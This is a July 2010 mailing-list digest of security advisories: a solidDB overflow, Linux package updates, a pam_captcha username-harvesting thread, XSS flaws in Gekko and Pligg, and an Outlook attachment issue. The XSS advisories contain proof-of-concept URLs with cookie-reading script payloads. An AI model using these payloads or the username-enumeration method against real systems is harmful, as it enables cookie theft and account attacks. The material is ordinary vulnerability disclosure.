ZDI-10-125: IBM SolidDB solid.exe Handshake Request Username Field Remote Code 
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-125
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
IBM

-- Affected Products:
IBM solidDB

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9983. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of IBM solidDB. Authentication is not required
to exploit this vulnerability.

The specific flaw exists within the solid.exe process which listens by
default on TCP port 1315. The code responsible for parsing the first
handshake packet does not properly validate the length of the username
field. By crafting an overly long value in the request an attacker can
exploit this to execute arbitrary code under the context of the SYSTEM
user.  

-- Vendor Response:
IBM has issued an update to correct this vulnerability. More
details can be found at:

http://www-01.ibm.com/support/docview.wss?uid=swg21439148amp;myns=swgimgmtamp;mynp=OCSSPK3Vamp;mync=R

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* AbdulAziz Hariri and Zein Fneish Insight Technologies

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

[ MDVSA-2010:132 ] python

2010-07-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:132
 http://www.mandriva.com/security/
 ___

 Package : python
 Date: July 14, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities has been found and corrected in python:
 
 Multiple integer overflows in audioop.c in the audioop module in
 Ptthon allow context-dependent attackers to cause a denial of service
 (application crash) via a large fragment, as demonstrated by a call
 to audioop.lin2lin with a long string in the first argument, leading
 to a buffer overflow.  NOTE: this vulnerability exists because of an
 incorrect fix for CVE-2008-3143.5 (CVE-2010-1634).
 
 The audioop module in Python does not verify the relationships between
 size arguments and byte string lengths, which allows context-dependent
 attackers to cause a denial of service (memory corruption and
 application crash) via crafted arguments, as demonstrated by a call
 to audioop.reverse with a one-byte string, a different vulnerability
 than CVE-2010-1634 (CVE-2010-2089).
 
 Packages for 2008.0 and 2009.0 are provided as of the Extended
 Maintenance Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 4f913679ea6f154f0d7c84c8bafd3fe3  
2008.0/i586/libpython2.5-2.5.2-2.7mdv2008.0.i586.rpm
 dfab01f9210fa284ad3b4dd271bfb3dd  
2008.0/i586/libpython2.5-devel-2.5.2-2.7mdv2008.0.i586.rpm
 b6245a9dc5423d14ba96f4f388dd0fe6  
2008.0/i586/python-2.5.2-2.7mdv2008.0.i586.rpm
 15c39b51c66cc78aec157eaed0267a7b  
2008.0/i586/python-base-2.5.2-2.7mdv2008.0.i586.rpm
 e38a9894712bf82a8dcc1eee1265592c  
2008.0/i586/python-docs-2.5.2-2.7mdv2008.0.i586.rpm
 2f2100e6dd35a4aef8e503394a723e81  
2008.0/i586/tkinter-2.5.2-2.7mdv2008.0.i586.rpm
 29b96d4b84a7241fc78f55671f1a33f0  
2008.0/i586/tkinter-apps-2.5.2-2.7mdv2008.0.i586.rpm 
 211a673f3cd2e1b7d153d6f40291ad86  
2008.0/SRPMS/python-2.5.2-2.7mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 5f9e4e0e27dfa80a7fa2bf62998edf25  
2008.0/x86_64/lib64python2.5-2.5.2-2.7mdv2008.0.x86_64.rpm
 36bfe236a350a8e9a0e2657eefadd299  
2008.0/x86_64/lib64python2.5-devel-2.5.2-2.7mdv2008.0.x86_64.rpm
 c03cc44dac5ecdf49d7bf2ca5ad5477a  
2008.0/x86_64/python-2.5.2-2.7mdv2008.0.x86_64.rpm
 1965d6962b5cfe7349f4369bceda2ce4  
2008.0/x86_64/python-base-2.5.2-2.7mdv2008.0.x86_64.rpm
 e13c770d7ddcc045251733d69865a3ae  
2008.0/x86_64/python-docs-2.5.2-2.7mdv2008.0.x86_64.rpm
 cff8d5ef80f29b2f9e32e171420ede11  
2008.0/x86_64/tkinter-2.5.2-2.7mdv2008.0.x86_64.rpm
 e8d3db4327d427c9451bf604e5cd1bb7  
2008.0/x86_64/tkinter-apps-2.5.2-2.7mdv2008.0.x86_64.rpm 
 211a673f3cd2e1b7d153d6f40291ad86  
2008.0/SRPMS/python-2.5.2-2.7mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 598630ce234cff98465351b4af90d664  
2009.0/i586/libpython2.5-2.5.2-5.6mdv2009.0.i586.rpm
 44a691ffb51a47dd653fbf03d5a9be00  
2009.0/i586/libpython2.5-devel-2.5.2-5.6mdv2009.0.i586.rpm
 ea55908df10ad9e82a5d361612bcbca7  
2009.0/i586/python-2.5.2-5.6mdv2009.0.i586.rpm
 cb25c56f6f68e0bb036cd1be0360595d  
2009.0/i586/python-base-2.5.2-5.6mdv2009.0.i586.rpm
 0161f8c43b4fbf019ef24a72760d3113  
2009.0/i586/python-docs-2.5.2-5.6mdv2009.0.i586.rpm
 987651d11ca710910a89e52330873187  
2009.0/i586/tkinter-2.5.2-5.6mdv2009.0.i586.rpm
 a73ba0fa7adcb1ebe2806335e575e8b2  
2009.0/i586/tkinter-apps-2.5.2-5.6mdv2009.0.i586.rpm 
 a6602a71f4573ecb82951a861165fee8  
2009.0/SRPMS/python-2.5.2-5.6mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 f22f06db4cc4e8f431aadeaa552f0891  
2009.0/x86_64/lib64python2.5-2.5.2-5.6mdv2009.0.x86_64.rpm
 a15984e4b2e6821789ba36760aa08a79  
2009.0/x86_64/lib64python2.5-devel-2.5.2-5.6mdv2009.0.x86_64.rpm
 329f34c1eb9cbf68805edcbb0efda8a2  
2009.0/x86_64/python-2.5.2-5.6mdv2009.0.x86_64.rpm
 5404e1caa073784bbcb6aab8dff592bf  
2009.0/x86_64/python-base-2.5.2-5.6mdv2009.0.x86_64.rpm
 59e2bbd0517468929db90ad4e9448dc7  
2009.0/x86_64/python-docs-2.5.2-5.6mdv2009.0.x86_64.rpm
 b9821ba18b02ad9ae3b5831ac4893fee  
2009.0/x86_64/tkinter-2.5.2-5.6mdv2009.0.x86_64.rpm
 3593d6bdf3fbc698301edee3d0906e58  
2009.0/x86_64/tkinter-apps-2.5.2-5.6mdv2009.0.x86_64.rpm 
 a6602a71f4573ecb82951a861165fee8  
2009.0/SRPMS/python-2.5.2-5.6mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 3404f9ddf0f432a2ba81e78ce0408fd8  

Re: pam_captcha username harvest vulnerability

2010-07-15 Thread Ian Maguire
On 7/14/2010 10:04 PM, Jordan Sissel wrote:
 On Tue, Jul 6, 2010 at 11:04 AM, Ian Maguireimagu...@superb.net  wrote:

 pam_captcha is visual text-based CAPTCHA challenge module for PAM that uses
 figlet to generate the CAPTCHAs.

 Project site:
 http://www.semicomplete.com/projects/pam_captcha/

 A site with a screen shot:
 http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha

 I found a security problem with the pam_captcha. If you enter a username
 that is not a valid user followed by the correct CAPTCHA, you do not get
 prompted for a password. You simply get prompted for another CAPTCHA.
 However, if you enter a username that is a valid user followed by the
 correct CAPTCHA, you will get prompted for a password. This means an
 attacker, or a script/bot could easily harvest a list of valid usernames
 simply by whether or not it prompts for a password after a valid captcha
 entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's
 OpenPAM. From what I have seen this module is not compatible with Linux-PAM.

 I don't know enough C Fu to propose a patch. Until it is patched the
 solution is to disable pam_captcha in your pam config file. The creator of
 this module seems to think that using this module isn't really even
 necessary.

 http://www.semicomplete.com/blog/geekery/pam_captcha_research.html


 - ian


 I can't reproduce the behavior you describe on FreeBSD 8.0 nor on
 Ubuntu 9.10. It seems more likely that what you experience is actually
 misconfigured sshd/pam.

 With pam_captcha 1.3 on a fresh FreeBSD 8.0-RELEASE and this
 /etc/pam.d/sshd config:
 auth    sufficient  pam_opie.so   no_warn no_fake_prompts
 auth    requisite pam_opieaccess.so no_warn allow_local
 auth requisite pam_captcha.so randomstring
 #auth   sufficient  pam_krb5.so   no_warn try_first_pass
 #auth   sufficient  pam_ssh.so    no_warn try_first_pass
 auth    required  pam_unix.so   no_warn try_first_pass

 My sshd_config has this:
 ChallengeResponseAuthentication yes
 PasswordAuthentication no
 UsePAM yes

 What I see: Successful pass of the captcha with an invalid username
 results in being given another captcha or an abort (if this is
 multiple failures) and PAM logs the fact that there was a failure due
 to invalid user.


This behavior you are describing is exactly the problem. When you
enter a valid username, followed by a successful captcha entry, it
prompts you for a password. However, if you enter an invalid username,
followed by a successful captcha entry, it prompts you for another
captcha instead of a password. Since the behavior is different when it
is an invalid username, it is trivial to harvest a list of valid
usernames.
For example, if you are using pam_captcha, an attacker can immediately
know if you allow root ssh logins simply by attempting to ssh in as
root, and noticing whether, or not there is a prompt for a password
after a valid captcha entry. They can do this with any username. Make
a script to automate it, and they can harvest a list of valid
usernames.


 For example, if you don't disable PasswordAuthentication then pam
 failures could (captcha or other failures) will give up after a few
 tries and move on to Password auth (no captcha) auth instead.

 Are you sure this isn't something misconfigured on your side? Can you
 publish your sshd_config and pam configs?


This was on a fresh install of FreeBSD 8.0 with no modifications to
the sshd config, so I won't bother sharing that one. The only the
change I made to the pam config was adding the pam captcha line at the
beginning. I'll paste the /etc/pam.d/sshd config below:
#
# $FreeBSD: src/etc/pam.d/sshd,v 1.16.10.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
# PAM configuration for the sshd service
#
# auth
auth            requisite       pam_captcha.so          randomstring
auth            sufficient      pam_opie.so             no_warn no_fake_prompts
auth            requisite       pam_opieaccess.so       no_warn allow_local
#auth           sufficient      pam_krb5.so             no_warn try_first_pass
#auth           sufficient      pam_ssh.so              no_warn try_first_pass
auth            required        pam_unix.so             no_warn try_first_pass
# account
account         required        pam_nologin.so
#account        required        pam_krb5.so
account         required        pam_login_access.so
account         required        pam_unix.so
# session
#session        optional        pam_ssh.so
session         required        pam_permit.so
# password
#password       sufficient      pam_krb5.so             no_warn try_first_pass
password        required        pam_unix.so             no_warn try_first_pass


 -Jordan




[USN-962-1] VTE vulnerability

2010-07-15 Thread Kees Cook
===
Ubuntu Security Notice USN-962-1  July 15, 2010
vte vulnerability
CVE-2010-2713
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  libvte9 1:0.20.0-0ubuntu2.1

Ubuntu 9.10:
  libvte9 1:0.22.2-0ubuntu2.1

Ubuntu 10.04 LTS:
  libvte9 1:0.23.5-0ubuntu1.1

After a standard system update you need to restart your session to make
all the necessary changes.

Details follow:

Janne Snabb discovered that applications using VTE, such as gnome-terminal,
did not correctly filter window and icon title request escape codes.  If a
user were tricked into viewing specially crafted output in their terminal,
a remote attacker could execute arbitrary commands with user privileges.


Updated packages for Ubuntu 9.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/v/vte/vte_0.20.0-0ubuntu2.1.diff.gz
  Size/MD5:   428402 e765295968fe78b4d8e72050dce5f2b7
http://security.ubuntu.com/ubuntu/pool/main/v/vte/vte_0.20.0-0ubuntu2.1.dsc
  Size/MD5: 1742 91b6ea4ecd1400d57d72190fab77960c
http://security.ubuntu.com/ubuntu/pool/main/v/vte/vte_0.20.0.orig.tar.gz
  Size/MD5:  1372195 2634f593b93950c58cc12983bdc363cc

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-common_0.20.0-0ubuntu2.1_all.deb
  Size/MD5:34100 cb3960a156fb27606aeafcc8a3222b46

http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-doc_0.20.0-0ubuntu2.1_all.deb
  Size/MD5:64118 50ab6b9ed24762be4629e480b28e18c1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_amd64.deb
  Size/MD5:   381230 d11c934f31bd1382bb6d62603e839199

http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_amd64.udeb
  Size/MD5:   333636 77562502f522d91fbbea6b5eba1d0982

http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_amd64.deb
  Size/MD5:   599364 edc9be7f0fa11e6281a553208dfb3842

http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_amd64.deb
  Size/MD5:   177654 58665e2a253ecf2653d9023733573ce2

http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte_0.20.0-0ubuntu2.1_amd64.deb
  Size/MD5:36754 2f3d7f2540a8e6089eb143887ece13d2

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_i386.deb
  Size/MD5:   357832 e255a12e7f921dd4da70a9c81ccd8a72

http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_i386.udeb
  Size/MD5:   320620 b0f150837119c4e557c9c535a969e949

http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_i386.deb
  Size/MD5:   578074 cefed97e22169f7c47d2576ff925b3ff

http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_i386.deb
  Size/MD5:   160650 3c6f0e195b16937bd6c159bc32ffd34c

http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte_0.20.0-0ubuntu2.1_i386.deb
  Size/MD5:29878 082fd94ee2d4079d8e120e7adc525d01

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_lpia.deb
  Size/MD5:   357150 275ea65ad8d4f0afa645070809bc83db

http://ports.ubuntu.com/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_lpia.udeb
  Size/MD5:   318818 d4239f5aca45b71b5b51469111abaaa1
http://ports.ubuntu.com/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_lpia.deb
  Size/MD5:   575628 90f4af7d86e34f4eb49ac2c69751b544

http://ports.ubuntu.com/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_lpia.deb
  Size/MD5:   161258 9906e6464b75188f61bcf2626209f4e5

http://ports.ubuntu.com/pool/main/v/vte/python-vte_0.20.0-0ubuntu2.1_lpia.deb
  Size/MD5:29788 5d8228882a46943378e300854c2e8bf9

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_powerpc.deb
  Size/MD5:   434366 44f0c8d2cc517dec5cda7b23ae364989

http://ports.ubuntu.com/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_powerpc.udeb
  Size/MD5:   380478 af6da9a37b4b4dfe9277985388726c97

http://ports.ubuntu.com/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_powerpc.deb
  Size/MD5:   702506 9cd310cc8a3a9b10eb3ee3753500fcbe

http://ports.ubuntu.com/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_powerpc.deb
  Size/MD5:   171112 1392f41f7fd399d4f5a2b6901b9afdc8


[security bulletin] HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access

2010-07-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02286083
Version: 1

HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution 
of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2010-07-12
Last Updated: 2010-07-13

Potential Security Impact: Remote execution of arbitrary code, remote Denial of 
Service (DoS), remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Insight Control 
for Linux (IC-LX). The vulnerabilities could be remotely exploited to allow 
execution of arbitrary code, remote Denial of Service (DoS), and remote 
unauthorized access.

References: CVE-2009-0692, CVE-2007-5497, CVE-2007-2452, CVE-2010-0001, 
CVE-2010-1129, CVE-2008-5110

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control for Linux 6.0 and previous versions

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2009-0692(AV:A/AC:L/Au:N/C:C/I:C/A:C)8.3
CVE-2007-5497(AV:N/AC:M/Au:N/C:P/I:P/A:N)4.9
CVE-2007-2452(AV:N/AC:M/Au:S/C:P/I:P/A:P)6.4
CVE-2010-0001(AV:N/AC:M/Au:N/C:P/I:P/A:P)6.8
CVE-2010-1129(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5
CVE-2008-5110(AV:N/AC:M/Au:N/C:C/I:C/A:C)   10.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

Note: HP Insight Control for Linux v6.1 incorporates updated packages that 
include security updates for Dhclient, E2fsprogs, Findutils, Gzip, PHP and 
Syslog-ng.

RESOLUTION

HP has provided HP Insight Control for Linux v6.1 to resolve this 
vulnerability. The updated kit can be downloaded as follows. Browse to 
http://www.hp.com/go/ic-lx and click on Software Downloads.

PRODUCT SPECIFIC INFORMATION
None

HISTORY
Version:1 (rev.1) - 12 July 2010 Initial Release
Version:2 (rev.2) - 13 July 2010 Changed abbreviated name to IC-LX

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's 

XSS vulnerability in Gekko Web Builder

2010-07-15 Thread advisory
Vulnerability ID: HTB22474
Reference: 
http://www.htbridge.ch/advisory/xss_vulnerability_in_gekko_web_builder.html
Product: Gekko Web Builder
Vendor: Baby Gekko IT Consulting ( http://www.babygekko.com/ ) 
Vulnerable Version: v0.90 ALPHA and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the /admin/index.php script to 
properly sanitize user-supplied input in app variable. Successful 
exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or 
modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:
http://host/admin/index.php?app=settings;scriptalert(document.cookie)/script




Outlook PR_ATTACH_METHOD file execution vulnerability

2010-07-15 Thread Akita Software Security

Outlook PR_ATTACH_METHOD file execution vulnerability

Yorick Koster, October 2009


Abstract


It has been discovered that certain e-mail message cause Outlook to
create Windows shortcut-like attachments or messages within Outlook.
Through specially crafted TNEF streams with certain MAPI attachment
properties, it is possible to set a path name to files to be executed.
When a user double clicks on such an attachment or message, Outlook will
proceed to execute the file that is set by the path name value. These
files can be local files, but also file stored remotely for example on a
file share. Exploitation is limited by the fact that its is not 
possible for attackers to supply command line options.


See also

- CVE-2010-0266 [2]
- MS10-045 [3] Vulnerability in Microsoft Office Outlook Could Allow
Remote Code Execution (978212)
- Security Research  Defense blog: [4] MS10-045: Microsoft Office
Outlook Remote Code Execution vulnerability
- KB978212 [5] MS10-045: Vulnerability in Microsoft Office Outlook could
allow remote code execution
- KB2271150 [6] You cannot open linked file attachments in Outlook:
Outlook blocked access to the following potentially unsafe
attachments
- SSD: [7] SecuriTeam Secure Disclosure program


Tested version


This issue was tested on the latest versions of Outlook 2003 SP3 and
Outlook 2007 SP2.


Fix


Microsoft released MS10-045 [8] that blocks unsafe use of the
PR_ATTACH_METHOD property in e-mail messages.


Introduction


Microsoft Office Outlook is a personal information manager. It is often
mainly used as an e-mail application, but it also includes a calendar,
task manager, contact manager, note taking, a journal and web browsing.

Outlook supports various e-mail formats, including plain text, HTML and
TNEF. TNEF is a proprietary format used by Microsoft Outlook and
Microsoft Exchange Server. TNEF messages or TNEF streams exist of
message and/or attachment attributes. These attributes contain basic
properties, such as message subject, date sent and attachment title
(file name). Additional attributes can be set using MAPI properties,
which are stored in attMAPIProps or attAttachment TNEF structures.


MAPI attachment properties


In MAPI, there are a couple of properties available that are specific
for handling e-mail attachments. One of these properties is the
PR_ATTACH_METHOD property. This property can be set to a MAPI-defined
constant and represents the way the contents of an attachment can be
accessed. For most attachments, this property will be set to
ATTACH_BY_VALUE. When set to this value, the attachment data is either
stored in the PR_ATTACH_DATA_BIN MAPI property or it is stored in a
attAttachData TNEF structure.

If the PR_ATTACH_METHOD property is set to ATTACH_BY_REFERENCE,
ATTACH_BY_REF_ONLY or ATTACH_BY_REF_RESOLVE, Outlook expects a
fully-qualified path name instead of an embedded attachment. This path
name is set using either the PR_ATTACH_PATHNAME or
PR_ATTACH_LONG_PATHNAME MAPI property. The path name can be set to a
Universal naming convention (UNC) name.


ATTACH_BY_REF_RESOLVE


A message or attachment can have a Message Class property that loosely
defines the type of a message, contact or other personal information
manager objects. For normal e-mail messages, the message class is set to
IPM.Note. The Message Class is set by the TNEF attMessageClass
structure or by the PR_MESSAGE_CLASS MAPI property.

If the Message Class is set to IPM.Document Outlook will process this
message as an e-mail message consisting of a single attachment. By
appending a subclass to IPM.Document it is possible to more specifically
state what type of document the attachment is. For example, a Message
Class of IPM.Document.txtfile indicates that the attachment is a plain
text file, while IPM.Document.Excel.Sheet.12 indicates a Microsoft Excel

XSS vulnerability in Pligg search module

2010-07-15 Thread advisory
Vulnerability ID: HTB22467
Reference: 
http://www.htbridge.ch/advisory/xss_vulnerability_in_pligg_search_module.html
Product: Pligg
Vendor: Pligg, LLC ( http://www.pligg.com/demo/ ) 
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking  Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the search.php script to properly 
sanitize user-supplied input in search variable. Successful exploitation of 
this vulnerability could result in a compromise of the application, theft of 
cookie-based authentication credentials, disclosure or modification of 
sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is 
available:
http://host/search/1;scriptalert(document.cookie)/script




[SECURITY] [DSA 2070-1] New freetype packages fix several vulnerabilities

2010-07-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2070-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
July 14, 2010 http://www.debian.org/security/faq
- 

Package: freetype
Vulnerability  : several
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2010-2497 CVE-2010-2498 CVE-2010-2499 CVE-2010-2500 
CVE-2010-2519 CVE-2010-2520 CVE-2010-2527

Robert Swiecki discovered several vulnerabilities in the FreeType font 
library, which could lead to the execution of arbitrary code if a
malformed font file is processed.

Also, several buffer overflows were found in the included demo programs.


For the stable distribution (lenny), these problems have been fixed in
version 2.3.7-2+lenny2.

For the unstable distribution (sid), these problems have been fixed in
version 2.4.0-1.

We recommend that you upgrade your freetype packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.dsc
Size/MD5 checksum: 1219 a5930e5dfa3757bed045a67b7ef0e3e2
  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7.orig.tar.gz
Size/MD5 checksum:  1567540 c1a9f44fde316470176fd6d66af3a0e8
  
http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.diff.gz
Size/MD5 checksum:36156 f1cb13247588b40f8f6c9d232df7efde

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_alpha.deb
Size/MD5 checksum:   775180 d9d1a2680550113aab5a5aa23998458e
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_alpha.deb
Size/MD5 checksum:   411954 63d800f83bd77f18b9307cd77b5cfd1d
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_alpha.deb
Size/MD5 checksum:   253784 b95be0af80d58e4e0818dd9b66447d9e
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_alpha.udeb
Size/MD5 checksum:   296564 6e080492ee03692588c5953b36bade6d

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_amd64.udeb
Size/MD5 checksum:   269680 4c9e6efc6c36f0867c74dde033b97ac8
  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_amd64.deb
Size/MD5 checksum:   223010 5b9c55fc8ef35251ccdc3c1d22b13edd
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_amd64.deb
Size/MD5 checksum:   713084 b5933f78399f7d690f786fb7f04d1eca
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_amd64.deb
Size/MD5 checksum:   385600 741877f101eef1dd6f77aead47ddbba1

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_arm.deb
Size/MD5 checksum:   205134 624b8b38b6cea2d569c70a18a5f78934
  
http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_arm.udeb
Size/MD5 checksum:   242180 d7c5020f9cb5417378b80571bc2eccd4
  
